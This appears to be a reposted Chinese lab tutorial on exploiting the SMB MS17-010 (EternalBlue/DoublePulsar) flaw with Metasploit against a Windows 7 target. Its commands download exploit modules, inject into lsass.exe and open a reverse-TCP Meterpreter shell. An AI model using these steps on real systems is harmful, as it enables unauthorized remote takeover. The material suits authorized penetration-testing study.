smb(ms17-010)远程命令执行之msf
本次用到的环境:
kali(2016.2)32位系统.ip地址:192.168.1.104
目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105
具体的步骤如下:
kali系统下安装wine32:
apt-get install wine32
用wine32执行cmd.exe
wine cmd.exe
exit //退出
git clone下载其利用脚本:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb
cd Eternalblue-Doublepulsar-Metasploit/ cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb
启动msf,然后进行一系列设置:
service postgresql start msfconsole
search eternalblue use exploit/windows/smb/eternalblue_doublepulsar
set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/depsset ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/depsset PROCESSINJECT lsass.exeset TARGETARCHITECTURE x64set rhost 192.168.1.105show targetsset target 9set payload windows/x64/meterpreter/reverse_tcpshow optionsset lhost 192.168.1.104exploit
附录:
msf下的ms17-010模块:
前提条件:
1. gem install ruby_smb #ruby_smb模块安装
2.msfupdate #msf的更新
3.msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue" #启动并加载模块
root@backlion:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb root@backlion:/opt# cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rbUse exploit/windows/smb/ms17_010_eternalbluemsf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcpmsf exploit(ms17_010_eternalblue) >exploitMeterpreter> sysinfo
转载于:https://www.cnblogs.com/backlion/p/6804863.html
smb(ms17-010)远程命令执行之msf相关推荐
- NSA泄密事件之SMB系列远程命令执行漏洞及Doublepulsar后门全球数据分析
本文讲的是NSA泄密事件之SMB系列远程命令执行漏洞及Doublepulsar后门全球数据分析, 1. 概述 2017 年 4 月 14 日,黑客组织Shadow Brokers 公布了一批新的N ...
- webmin远程命令执行漏洞(cve-2019-15107)深入分析
漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...
- Cisco Smart Install远程命令执行漏洞
0x01前言 在Smart Install Client代码中发现了基于堆栈的缓冲区溢出漏洞,该漏洞攻击者无需身份验证登录即可远程执行任意代码.cisco Smart Install是一种" ...
- CVE-2019-19781 Citrix ADCNetScaler远程命令执行漏洞
未经允许,不得擅自转载,违者必究 一.前言 @Adminxe 因为最近在刷edusrc,由此发现这个漏洞,涉及多所高校,所以过来给大家实战POC测试一波,可直接进行命令执行,Citrix产品中的漏洞使 ...
- MS08-067 (CVE-2008-4250) 远程命令执行漏洞
文章目录 前言 一.漏洞简介 二.影响范围 三.漏洞危害 四.本地复现 五.补丁编号 六. Windows Server 2003 SP2 中文版利用方法 七.漏洞原理深度剖析 前言 本文为08年出现 ...
- ssh升级后+sftp+java_java中使用JSCH包,SFTP及SSH2文件操作及远程命令执行(改进)...
我写过一篇java中使用JSCH包,SFTP及SSH2文件操作及远程命令执行,现在想来,觉得调用方式太过于绕,不符合我写程序的风格,所以进行了改进. 参数类,用于配置连接的参数,SshConfigur ...
- exim远程命令执行漏洞分析(cve-2019-10149)
0x00 前言 在对Exim邮件服务器最新改动进行代码审计过程中,我们发现4.87到4.91版本之间的Exim存在一个远程命令执行(RCE)漏洞.这里RCE指的是远程命令执行(Remote Comma ...
- 【注意】关于Redis存在远程命令执行漏洞的安全公告
点击蓝色"程序猿DD"关注我 回复"资源"获取独家整理的学习资料! 来源:CNVD漏洞平台 安全公告编号:CNTA-2019-0024 2019年7月10日,国 ...
- 【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)
0x00复现环境 ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell) 0x01步骤 点击start to hack 进入环境页面 run t ...
最新文章
- 使用第三方SDK(如微信、qq、快看、头条等),调用接口405 Method Not Allowed
- 集中式管理助推服装企业腾飞
- 先进数据系统实验室(Advanced Data Systems Laboratory, ADSL)
- C++第五章课后习题-输入n个字符串,把其中以字母A打头的字符串输出
- 12 浏览器对象模型BOM
- 传感器模块(光敏电阻/热敏电阻/红外接收管等)介绍及使用
- Java项目(五子棋)
- 语义分割—遥感影像数据标签制作(ARCGIS)
- Android提取分区镜像命令,Android取证:使用ADB和DD对文件系统做镜像
- 锁定计算机后如何显示文字,我的电脑图标和文字后面有拖影怎么去掉
- springcloud以及四大神兽面试涉及知识总结(持续更新)
- 小程序引入阿里矢量图
- 有没有计算机网课,有没有电脑录制视频工具可以录制网课?
- html 5 压缩zip,Zip
- Android P系统设置之默认打开定位开关(默认使用位置服务)
- comsol计算机模拟过程,基于COMSOL的甲苯催化燃烧过程的数值模拟
- Linux环境搭建spark3 yarn模式
- SQL数据库的组合查询和统计查询
- 火星探测器纷纷上天,人类离移民火星还远吗?
- 美国高清晕渲地形图分享,每一幅都值得珍藏
热门文章
- iOS13 已越狱 iOS12.4 已越狱
- 直接用自己服务器做图床可以吗_我花 9 块钱搭了一个“私人图床”
- Sorry, user *** is not allowed to execute ‘xxxx‘ as root on ****.
- java 线上运维_一次java应用线上运维实战
- [BUUCTF-pwn]——[ZJCTF 2019]EasyHeap
- [Bugku CTF——Pwn] pwn4
- c++内存管理-VC6
- 9.2.1 Renaming Retrieved Columns
- html格式文档结构保存数据库6,freeCAD文档结构
- java 有选择的查询_如何在Java中将准备好的语句用于选择查询?